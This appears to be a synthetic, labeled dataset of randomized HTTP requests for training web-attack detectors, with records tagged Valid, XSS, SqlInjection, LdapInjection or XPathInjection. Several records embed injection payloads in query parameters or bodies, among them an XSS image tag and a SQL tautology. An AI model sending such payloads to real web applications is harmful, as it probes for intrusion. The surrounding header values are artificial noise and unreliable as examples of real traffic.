If-None-Match: "2z71Qz3ikQ2rU_K"
If-Range: *
Max-Forwards: 0
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: NTLM aVRzd25zd3lpM0VhYUF1eXFlanp6bDNlZXBpNVpkcnpuaWJUZmE=
Range: 4-27
Referer: http://pstrOe.it/1osd0/5tTe.msf
TE: trailers
Trailer: Warning
User-Agent: a6sddbnhnj (wVYU92j7; ryt55gQjF; e_64uGpgi; u8GEqnZIy)
UA-CPU: Sparc
UA-Disp: 609,4490,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0287x026
Via: HTTP/9.4 www.fsdnni.html:76, isne/4.3 11.67.192.91
Transfer-Encoding: gzip
Upgrade: ts54/2.4, d9bEte/1.6, rdsh/2.9
Warning: 801 69.96.230.25 "gie9i8edctt4ENs" "Tue, 27 Jan 04 19:25:43 UTC"
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 55598980904343059452
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40486
Start - Id: 29229
class: Valid
GET /RiframeformacceptXgDVwetc/WEo3YPWZzA/9.k8AxXVZPuvvB/ptLglNV-x@5/rjkEebtwIgirxpoiwTa/r81mf2gPmmfYrvh9U/qA@oBN/vWY66O.KQ7i/roE@-8/Tteopdtoi7mn/tefEani29OgevcmA.html?GZ2Yp.pUSh=fhesoe%7Esa%29%5Cneibi8Et HTTP/1.0
Host: www.iutwoera.de
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: iso-10646-ucs-2, x-mac-arabic, x-mac-greek
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-stale=32008
Client-ip: 24.91.199.11
Cookie: ehtudDtl=select nA;anutPbh=rnpstiiO;td=qPmDs72Ph;ytor=3OAEvYH
Cookie2: $Version="37"
Date: Tue, 17 May 05 07:13:48 UTC
ETag: W/"0g6jIwNgmq@Y4ApsNc"
Expect: 100-continue
From: pfeb@exzls2nagt.biz
If-Modified-Since: Thu, 14 Dec 06 07:24:05 UTC
If-Unmodified-Since: Wed, 27 Feb 08 12:46:44 CET
If-Match: "UUd.6C-aXcD286CZ3YQ"
If-None-Match: *
If-Range: *
Max-Forwards: 506
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest qop=deeie
Authorization: Digest cnonce="nsUodO"
Range: -2
Referer: http://lhoanr.net/arleg.php3
TE: trailers
Trailer: If-Match
User-Agent: ellis (uvsHHt1r; hENoOYIQ; va@5bezg; aK3VbAo; iBgjNddm)
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 200x896
Via: FTP/2.1 236.39.8.29, HTTP/6.4 www.eqn5te.jpeg
Transfer-Encoding: gzip
Upgrade: Tstenr/0.4, yi4rf/1.2
Warning: 361 218.11.136.34 "5tnre7tafvhoea" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29229
Start - Id: 967
class: Valid
GET /tYK8K/eI-vfKIfIe@/s7yt/why8e3S0StT122YfHW59/e9ea/rDptSva2F4C/hTnKStkwo1h/ysamihQpsPOuAU.jpg? HTTP/1.0
Host: www.ssr9hiuh.cz
Connection: hwpsl3
Accept: audio/*
Accept-Charset: x-mac-icelandic, iso-8859-4;q=0.3
Accept-Encoding: identity;q=0.6
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 82.195.65.170
Cookie: rqlveebddhsen=wrF-58qsD7@b;meJdHt=nn;etfp=465290;rawsmmtnlotShe=\n0usr yoct;tlutt=o0
Cookie2: $Version="446"
Date: Sun, 08 Oct 06 24:00:47 UTC
ETag: "fq1Z02PL5UAwOQk.rNn"
Expect: lfsieb=esluey
From: drgltVi@44huhi.be
If-Modified-Since: Sun, 23 Sep 07 20:53:43 GMT
If-Unmodified-Since: Sat, 05 Nov 05 12:31:10 CET
If-Match: *
If-None-Match: "@Uj7by9A2NSnhhllZX2L"
If-Range: Sun, 06 Jun 04 22:57:02 CET
Max-Forwards: 5367
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: 93711-32096
Referer: /nRoozCer/xlnst.jpg
TE: gzip,chunked
Trailer: Connection
User-Agent: Easeksy
UA-CPU: 68000
UA-Disp: 710,919,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7955x0041
Via: 7.7 www.zaene.htm
Transfer-Encoding: identity
Upgrade: speh/3.3, Eai/0.1, hYun/9.4, uabeh/7.5, 8re3/1.6
Warning: 377 www.tccn1n.htm "TKmed" "Sun, 06 Sep 09 10:54:33 CET"
X-Forwarded-For: 18.21.214.141
X-Serial-Number: 045784
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 967
Start - Id: 25141
class: Valid
GET /rfspioeaoht7ffeem/RergtUa.jpeg?niQnzdnptnvT=uuEmhkssonn&aA5wxpa7tiejtn=1&Et2um=4297&toadltaeed=82724020&tTlgvetstda=4&aSfeiEaRuer=Li+&iv=oGk_&eoe9htmv=89&rolefe6ee78a=749219&3ou3naxd=ztoeDc5divdivseeaEA%3Et&rpiA6calhop70hu=ps&uhar=255996&csoEerdoQch=+e&iorheeeGhu7zti=912784 HTTP/1.0
Host: www.Kmeeoi.com
Connection: keep-alive
Accept: audio/x-wav, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: a-oidse, sexs-t, sh-atnc, a-hbl;q=0.2, l-owesIn
Cache-Control: no-store
Client-ip: 253.206.74.214
Cookie: aTbnph7pXes=1915;kdiaLart=39710;varBevalW385=uoie;BqZSi=3
Cookie2: $Version="537"
Date: Tue, 15 Dec 09 08:22:39 CET
ETag: W/"OdqQGT-K5rFaplwUgeJ"
Expect: ozhlgoc
From: eMfiaeeO@ftisitrql.fr
If-Modified-Since: Fri, 06 Aug 04 10:58:31 CET
If-Unmodified-Since: Mon, 10 May 04 01:06:18 CET
If-Match: "jFtle6ug98cD1VEuK_r"
If-None-Match: *
If-Range: "dR88Evj1OhKrV-m"
Max-Forwards: 1
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM b3JkdHBhMWFvaGVsYXRFZWUzMG9pajlpc25vaTl0YW5udW4=
Authorization: Digest algorithm=Naios
Range: -7771,422958-
Referer: http://www.nsaihN.com/oZ5atdu/ereIrtb1/boftto.gif
TE: trailers,deflate
Trailer: If-None-Match
User-Agent: oh6nq9vF http://www.ytaspS.com
UA-CPU: PowerPC
UA-Disp: 037,012,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5457x802
Via: als9U/7.9 www.lrnto.gif, 6.8 32.249.184.63:9
Transfer-Encoding: identity
Upgrade: oulp3p/8.2
Warning: 667 www.ecitwrb.jpg "hagkslkdeoiEwoaeL" "Sun, 08 Aug 04 11:38:20 GMT"
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 3897200999
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 25141
Start - Id: 48043
class: XSS
GET /4iaBialbsEor5eagx/lSihevrewohOd7iS6lo/ntU4/@qdn.Kpif/aNDyA3S7r/imeyAia/thsal/Iq0ee7/w1aAr6h5/ae8rlwt9h/Ldv.css?ttjr27=03114&Rbov=ervl&czraiop=8096&kaaclpmo0nn=hrrRobjectnra+FroI0Eiese0&rdolelteVv=+e%25h&e9e7rL=cia&O-uGBMry=eliuM&kIlnhrthen=oafdredeers&na8dad=erI&ubyrhn=gey%3E&deohbxgv=%3Cimg+src++++%3D+++%22++javascript%3A%5Balert++++%28%277evniher%27%29%3B%5D++%22%3E&wwpmidbtuso=n5D.qLhB HTTP/1.0
Host: www.rsltyoiwp.biz:80
Connection: nhawotS
Accept: image/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 6nr-Tiu4eg;q=0.2, sEha-Ih;q=0.0, EN0lS4-jeuefs, 6o-rmseu;q=0.6
Cache-Control: no-transform
Client-ip: 133.190.92.118
Cookie: a3ituwied=rs8tBOXC;vhayimdoev=5
Cookie2: $Version="2"
Date: Wed, 03 Jan 07 18:43:09 CET
ETag: "n-K9zdPmuBy1CV7jG"
Expect: sntr=swesei6
From: uesois@ewrsoxtt.it
If-Modified-Since: Fri, 17 Nov 06 12:40:11 CET
If-Unmodified-Since: Sun, 26 Apr 09 09:30:08 CET
If-Match: *
If-None-Match: "VZi8rGLvZrD8i_ikN"
If-Range: Sat, 06 Aug 05 23:27:26 UTC
Max-Forwards: 399
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: jae8sr 0tnaix=eudc
Authorization: NTLM MGJzZ2lqbWllcmVBeThudGVhZG93d2E5cmxpeXZtZW5lT3dzOG1jc2FhZXNy
Range: -2,4927-,7358-69
Referer: /jaaehnc1.php3
TE: trailers,chunked,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.8 (Machintosh; U; PPC 8.2; aw-tL; rv:7.6.8) Gecko/27244247
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 965x958
Via: FTP/6.5 214.105.196.253:5, 8.3 www.ztsa.html
Transfer-Encoding: compress
Upgrade: odv/3.8, cye8/8.2
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 405569074263988888
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48043
Start - Id: 39006
class: LdapInjection
POST /cKg/mbTaAL_dAXA_lEUVdZly/nC7LaCWf/aatpaoDLtgaeknrinuon/hsesbltr/asn9/eFsQK_sOqy0EYV6/wkets.cfm? HTTP/1.0
Content-Length: 203
Content-Language: U4votc
Content-Encoding: identity
Content-Location: /upomt/lwshbtai/rmomtni/r6eqe.jpg
Content-MD5: b2V3b2huZTVpb3JuYXRhcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jul 05 21:07:29 UTC
Last-Modified: Fri, 15 Jan 10 22:16:10 UTC
Host: www.iotfyBepo.org:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1252
Accept-Encoding: )    (    |(ea=cs8*)
Accept-Language: q-d, l6-athmtsdd;q=0.0, Aypohe-4sl;q=0.1
Cache-Control: only-if-cached
Client-ip: 205.198.95.102
Cookie: Tlohmu=nC.Zxij2rq.a;7as=wao0
Cookie2: $Version="84"
Date: Tue, 20 Apr 10 16:24:47 UTC
ETag: "O58svtIX7UNw5jhS"
Expect: 100-continue
From: lThhoeh@8eere.gov
If-Modified-Since: Wed, 23 Mar 05 02:44:03 UTC
If-Unmodified-Since: Sat, 19 Sep 09 17:15:23 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Jul 09 09:35:30 UTC
Max-Forwards: 8748
Proxy-Authorization: otmtua usmc8bf=eaeteEa
Authorization: Digest opaque="pote"
Referer: http://kly6azlk.cz/Spaews0e/treumro/e3ci7h.shtml
TE: deflate,chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: iebuowpsgn
UA-CPU: x86
UA-Color: color16
UA-Pixels: 1899x922
Via: FTP/5.5 45.231.83.216, 9.1 44.162.178.114, 5.3 www.r8rri.png:098
Transfer-Encoding: gzip
Upgrade: frhiin/3.9
Warning: 579 217.170.61.118 "X8atie" "Sun, 24 Feb 08 05:56:07 CET"

c.YPs=aoOa&eyvy=udpositionahstdinefr 5eaeRh1scripto&4Lue=i &hente19ss3atl=o&nmonfmE=991189&gOa=2&afvodo9o=hNmn&JacceptjHpz= &u.Xnode2=iwhererr'' -Dn r43&rohseo4=d&3oga1yh=nOnCOrwyA&anfediDeeagair=nus

End - Id: 39006
Start - Id: 27144
class: Valid
GET /sZuW3P6LkboV5s5Dvd1/hPtbDuefon5ynneets6/USyZ-homelgou2L/wlHouY9U/rxliavmnrote.mspx? HTTP/1.1
Host: 30.138.165.18
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=74903
Client-ip: 198.90.183.128
Cookie: renceabhtrecl=niE8Twioocsfdnd;BkJW7nQIA=scdnisjg6;T3i=t:e;ite3nhH=vn0;nEhsns0n7A=0779231;tast9rRE=52996
Cookie2: $Version="304"
Date: Fri, 13 Jan 06 15:35:58 CET
ETag: "EqroVsI170GggWVYKj"
Expect: 100-continue
From: tiqc@jnte.gov
If-Modified-Since: Tue, 23 Sep 08 18:35:49 GMT
If-Unmodified-Since: Wed, 26 Mar 08 20:13:51 UTC
If-Match: "tTePC_n2GibXNaxxYTbW"
If-None-Match: *
If-Range: "C_NGDVAJloL6ey5p"
Max-Forwards: 25
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic NWFvbjpzbW5zcndC
Authorization: Basic b2RpRTpwYjNtY29pQQ==
Range: 876-071,453044-67,-1
Referer: /fadtFort/Hrlsngh.dll
TE: trailers
Trailer: Accept
User-Agent: cc7icf (e4vqUZC; hRrx6sE; giCfkX; twA0XOGth)
UA-CPU: x86
UA-Disp: 137,543,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 778x8944
Via: 3.1 www.dnengdj1.htm, gC6RL/1.8 www.r9tyr8.jpeg, vema/0.4 44.10.140.1
Transfer-Encoding: gzip
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27144
Start - Id: 41581
class: SqlInjection
GET /sXKLJtK89/FuHGJ/Te0n7a1wcesndst1/r14/s7atcaseb/sR3SHKW1/apadssrahe9u.mspx?dchioo=77Euy3K&er=%3Bisbti%3Ds&30ugo=106989&BcMOInullRwhere=8752&wEt2pmlmpSd39qE=loaIwhere&qqan5Ie=%27++++OR++%27ic8%27+%3E+++%27S&LexecNswekqoB=er5e%28nacceptL%7C%29izaphpy+&Eneen=crrOt5dQentsSRac&if2rRe=6481190 HTTP/1.0
Host: www.Lcyzt.org
Connection: keep-alive
Accept: application/rtf;q=0.9
Accept-Charset: euc-cn;q=0.0, cp-936, x-mac-arabic;q=0.9, iso-8859-1, iso-10646-ucs-2;q=0.0
Accept-Encoding: deflate;q=0.5, compress, compress, gzip, identity
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 38.173.11.46
Cookie: sessiriri=unionscriptA2nivbscriptbetween1eefebarsfo;exiahceTHt5=%d~;hzie1uE9s4=62;atMsitsxee=dg3tnullicala;qrnsernua8th= ss;7h=@
Cookie2: $Version="8"
Date: Fri, 05 May 06 04:55:13 GMT
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
If-Unmodified-Since: Sat, 15 Apr 06 05:20:50 UTC
If-Match: "f-qYG_DDORq5mdaMr57"
If-None-Match: *
If-Range: Mon, 03 Nov 08 17:00:35 CET
Max-Forwards: 5
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: NTLM aXNkRXRzNnJ5bm92aGlubm04dHRzY3RpTzJvdW5ucnQ4aWhm
Range: 57313-1061,-0,406-
Referer: /lnzz/peseiixl/acen.tiff
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: Mozilla/0.1 (X11; U; Linux i586 5.7; xg-ri; rv:5.5.5) Gecko/41643269
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: 5.4 143.4.250.146:20, FTP/8.3 www.nhte8it.htm:3
Transfer-Encoding: identity
Upgrade: eia/5.7
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41581
Start - Id: 5279
class: Valid
PUT /.hwIwindow.openSAGF40Pn/dtl9o3ngF2/3ltelnetT.ZzxdJkEd/s4ip9Na@aZjRq/ea/nsdMi/teO.html? HTTP/1.1
Content-Length: 88
Content-Language: scnaseh,iTojtn
Content-Encoding: compress
Content-Location: /ei3nl4t.php4
Content-MD5: QW0yN2FwYXMxZThmaGJzcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Mar 06 15:51:42 UTC
Last-Modified: Sat, 03 Jun 06 03:13:41 UTC
Host: www.njgees.be
Connection: geebSnh
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=6
Client-ip: 125.203.178.102
Cookie: eoroVIaciteaa=atonhEts Enph-u\a;9FCqhtacces=ttoope)4l ;ui=85844
Cookie2: $Version="82"
Date: Wed, 17 Nov 04 09:22:34 GMT
ETag: "TiPtZqe-ErUpLYpGLK7c"
Expect: 100-continue
From: rpfz@tmadFbssh.cz
If-Modified-Since: Sun, 25 Dec 05 04:18:38 GMT
If-Unmodified-Since: Fri, 02 May 08 02:25:40 UTC
If-Match: "tUsS8x9ru-tt7uY"
If-None-Match: "WNEVAePnZWrSUMF"
If-Range: Fri, 24 Feb 06 13:09:05 CET
Max-Forwards: 117
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: aghv eebTs=nisatc
Authorization: NTLM b25iZEFuSWVheW1ybmV3clJsbGVsMWFpMnJhYVRyY0hobzByc25jb2hUZWV0aA==
Range: 44-,39-,850121-
Referer: http://www.are83a1O.it/roiie/5hrsnmn/sa6teT.fgf
TE: chunked
Trailer: If-Range
User-Agent: Mozilla/7.6 (Windows; U; WinNT 8.5; mh-ii; rv:5.3.6) Gecko/75912964
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4414x768
Via: ldexif/8.6 www.0Ndm.js
Transfer-Encoding: deflate
Upgrade: vnWhh/6.9, 0cx/5.3
Warning: 731 183.237.250.141:0 "tuteLitohsstoT" 
X-Forwarded-For: 178.75.102.4
X-Serial-Number: 76349451666157165
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

skf=1&pdenad=otnxt&il6lm=scph@d-IXpN&dtcisEpuet6Eae=ps&8cSrt=9453659&onbB_T0E=86764004

End - Id: 5279
Start - Id: 27627
class: Valid
GET /svZR_iDvEYW5pO@Ic/sTEsm/jxp5-9EHs4MUU/jnesmHiyivstfatEtsso.html? HTTP/1.1
Host: www.f3al.uk
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rcsi-tte;q=0.5
Cache-Control: only-if-cached
Client-ip: 185.221.92.205
Cookie: tmOhcisTlea=9398971411;tn6voo3aeRiE=t5JfX-D3OIJd;joTea5=srto8isvbscriptjkeu]net
Cookie2: $Version="35"
Date: Wed, 08 Nov 06 08:21:58 UTC
ETag: W/"Q7FDirU-IyamM8-k"
Expect: seop=r3jomss
From: 06wy8l@mtedC.de
If-Modified-Since: Mon, 25 Oct 04 16:31:00 GMT
If-Unmodified-Since: Fri, 23 Jan 09 19:29:28 CET
If-Match: "1jsuZdoQptlVQzKN"
If-None-Match: "i35xzCX_hcq-upr"
If-Range: "Z3Ng8MUr27t9k1L3EW"
Max-Forwards: 7
MIME-Version: 9.4
Pragma: lh3nt3='d'
Proxy-Authorization: Basic WG5pYVc6YWljaGk=
Authorization: NTLM YmJudGR0bGVhd1lpb3dpaDh0YjFzTHVzZWd1ZWhScHRsOHNuYW4=
Range: -5
Referer: http://www.taSoiMaj.gov/onw2a/cn2Lco/omtsd.nsf
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 2.8; nb-se; rv:2.4.0) Gecko/94258571
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 794x6621
Via: 0.7 www.eaaR.png
Transfer-Encoding: Ltvem
Upgrade: eBhn/9.3, cagze/5.9
Warning: 907 95.3.6.240 "U0ssne4rnc" "Mon, 23 Jan 06 20:28:05 GMT"
X-Forwarded-For: 250.3.215.217
X-Serial-Number: 189697977036477
----: --------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27627
Start - Id: 49865
class: XPathInjection
GET /sJN7FD/c8d8AVV/ou_lSSnH17Lbb.jpeg?sk=awuh&ka=5Grv8enXtt%3Aoo%29+lear&RfSunionautoexecweN@9passwd=-ahdeleteiEautoexec2aopenvwsg6&Br@85icopyD92C=saIihee&Xzoiruau=dta4epo44yeauN0&Lx=nIheisnk%27++or+++plcen%2Fbme5e%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D02%5D+or+++++%27sammSE%27++++%3D++++%27&DpfoptZ@=uI9P0Uj&-UQ9LwperlZ=c&a7447k4uilob=s HTTP/1.1
Host: 109.69.108.222
Connection: utbtep
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.7, euc-jp, euc-jp;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-age=89
Client-ip: 45.244.106.212
Cookie: a9Rei=shul;diyynwtn1tegoa=i&%
Cookie2: $Version="5"
Date: Mon, 16 Jun 08 04:48:50 CET
ETag: "xcInQ_66Zglzx9B"
Expect: 100-continue
From: eslc7@67owp.net
If-Modified-Since: Sun, 16 Sep 07 02:49:10 CET
If-Unmodified-Since: Thu, 28 May 09 03:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: "3oI85smExYicW8c7yHH_"
Max-Forwards: 93
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM ZWVqV3N1OWVUYXJxc3puaXFzUmJlaWExZHRldG5maXR4ZTF0ZQ==
Range: 40331-8,658595-,136-
Referer: /Heeaadc.asmx
TE: chunked;q=0.9,trailers,trailers
Trailer: Accept-Encoding
User-Agent: yi7Stteosc (ex-rJmmI; smEFXPTvcG)
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: 5.2 135.250.4.51:62, 1.9 www.dhnth0F.png, HTTP/2.4 www.etsnmah.shtml:9724
Transfer-Encoding: gzip
Upgrade: eht/0.8, T3l/7.9, myt2/5.8
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49865
Start - Id: 4577
class: Valid
POST /tbgt25XMC9/lecl9rx0nhe0c/Zi4JycsS0HWinput/al7CgodckqGziP/h8oe/ttlat6s.asmx? HTTP/1.0
Content-Length: 168
Content-Language: togrlcm,eneuyae,dud
Content-Encoding: gzip
Content-Location: /tria/blfstDas.asp
Content-MD5: aXVUbnRJMmQ3ZXhyU3JySA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 May 06 15:23:57 UTC
Last-Modified: Sun, 29 Apr 07 18:35:34 CET
Host: 225.231.89.144
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1253
Accept-Encoding: *;q=0.3
Accept-Language: oxoa-h6tl, 0eon-ecT;q=0.0, T-nc;q=0.6
Cache-Control: only-if-cached
Client-ip: 106.227.160.192
Cookie: td=ah5efteWsieds;drAiaEaw1=e/epHi;e2s=005;tdr8sousrEtDuwq=6
Cookie2: $Version="006"
Date: Fri, 02 Apr 04 11:42:59 UTC
ETag: W/"vuwqQYwLICNtYcw6B@4"
Expect: fenc7s
From: a5wn@h3Rit.be
If-Modified-Since: Sat, 09 Oct 04 24:53:39 GMT
If-Unmodified-Since: Fri, 11 Sep 09 09:34:17 UTC
If-Match: *
If-None-Match: "hLWZV@b3IuW5E8L"
If-Range: Tue, 29 Aug 06 21:00:19 CET
Max-Forwards: 9495
MIME-Version: 6.2
Pragma: 6e8=thGlo
Proxy-Authorization: NTLM bzhzeWdFb2U4c3R0bm9adWxhemVyRXJpY2V0cHd1a2V0ZGVhaXR2c29vdHNjbndk
Authorization: taps elnih=oajRi
Range: -6763
Referer: http://www.jtca2n.ch/aInri/3cit/ilia/eaoet/7wsn.php4
TE: trailers
Trailer: Host
User-Agent: Mozilla/8.8 (Windows; U; Win98 4.7; EI-di; rv:4.4.8) Gecko/63320622
UA-CPU: StrongARM
UA-Disp: 067,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7773x905
Via: 7.9 www.nint.shtml, 4.4 www.iNtbii.shtml
Transfer-Encoding: identity
Upgrade: y3ba/9.8
Warning: 486 www.o1emOvc.jpeg "et3dsadpnrneep" "Thu, 23 Feb 06 09:52:01 GMT"
X-Forwarded-For: 41.244.54.15
X-Serial-Number: 09527
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

npdmtesnp=0d0naf&o7Oisto=p;&ioebuiite=37257&oMSdtsmdeerun=ieu(u]&7hiVbbi5an0am=00&nqfykbtttq=jtebodyThtpasswmerm8e9sk&Ntd=emCZEVAMLS&1dt0qUlhp=hselect ihiah2a 6bw

End - Id: 4577
Start - Id: 13354
class: Valid
GET /aiwPp/el9YiBOvXIEvJGc@ED8w.htm?em=1&ratRn7vhgI=3&gednqs=bhsSdmVgJ&4Ctsdcddgdei=o%40rcpc6fitrodetc&s82mdnagrs=s%40tQbGb4&6dsre=9087&IP=dRVGgegpmIBv&f3pO7K274v=u%5Ce HTTP/1.0
Host: 197.110.85.140
Connection: keep-alive
Accept: text/*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 236.35.112.203
Cookie: abwu=eusri;ei5t1lni=092463028
Cookie2: $Version="64"
Date: Mon, 04 Feb 08 06:13:20 UTC
ETag: "htwtWnHtKtmMXHTq2Qe"
Expect: msdd
From: tlCawc@aOrt.gov
If-Modified-Since: Fri, 14 Oct 05 10:22:30 GMT
If-Unmodified-Since: Thu, 08 Nov 07 18:31:00 CET
If-Match: "In4jY53zboyV2jgfa"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM eDhhbmZTaGE0bWFqbmV1ckQxc2V1YWxpZU9rdnRnc3JPNnMzaTMzbWI=
Authorization: NTLM ZXRmZnM3c2dubHdlMWVybzVlQmlzaTJ3ZGhldDJDYWU=
Range: 65-12,864719-469359
Referer: /gTr1/xbEHtzel/lbrnodee/trne/beSnwe.sh
TE: gzip;q=0.4,trailers,deflate
Trailer: Warning
User-Agent: Mozilla/3.2 (X11; U; Open BSD i386 3.3; ct-Zp; rv:0.1.7) Gecko/27202179
UA-CPU: x86
UA-Disp: 537,5554,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 643x366
Via: 7.2 75.130.68.201:4, 5.7 221.181.218.123:1, jih/3.9 85.3.72.9
Transfer-Encoding: compress
Upgrade: sdnNlu/3.0, lm9eS/0.7, 8706/7.7, 5ase/6.3
Warning: 350 www.YfEsvph.shtml "g1siOyhac" 
X-Forwarded-For: 11.178.147.8
X-Serial-Number: 581499383802447
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13354
Start - Id: 3400
class: Valid
GET /heecfuso/o8RRBfj/nD4vw_b4/vQtw0uTlx78t/5b.1mm/_F6RkOHmsock_streamCRLfFX/aooam22syomecoEI2ei/uBV1Vz11sLAtq/m9Ks8KiwJwNCU9YRfGuS/AHXFe8Rtg1X/irhOEA.dll?wt1nAreev=giiwr+1%5Df&xmlLY0TOD=qewtWfEayaeVt&cdlWsesm=eacntIueo&Sr4ts=9re++s&aUdivF=a%3Cedcat2sgudiga%2Fe&niO8eQ=samot9amsnercmd%5Duo%40&ldetR5es=uxdaHnnugs&damctt0ogoa=w.ih&doOhpiesecZb=4922 HTTP/1.1
Host: 220.124.153.79
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale=5216
Client-ip: 2.171.117.202
Cookie: aaergrieErko7o=ttan]tnt?window.open;ednoe=enlAcWgse00xeakliq
Cookie2: $Version="383"
Date: Thu, 28 Feb 08 18:10:13 GMT
ETag: W/"tvUBLjhMKWswmvBEOt"
Expect: orestO=oite
From: dI6hiwwe@sar5r6n.cz
If-Modified-Since: Fri, 30 Dec 05 16:12:20 UTC
If-Unmodified-Since: Thu, 29 Jan 04 18:19:21 CET
If-Match: *
If-None-Match: "crwFkS9bh8SU4M0OhsU5"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic am1YaThzdHQ6MWFtYWEyOA==
Authorization: Digest nonce
Range: 03774-3
Referer: http://waht.st/daiue/tmTeaunr/acaUotn.cgi
TE: trailers,trailers,gzip;q=0.2
Trailer: Upgrade
User-Agent: UoF5mm (elPT.I; a2dQWo-9EC; pp@Tdu-Cja)
UA-CPU: MIPS
UA-Disp: 3995,5069,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 969x7653
Via: FTP/3.1 www.ootnq.html, 4.8 7.110.124.49
Transfer-Encoding: identity
Upgrade: rdse/9.1, lomd/5.7
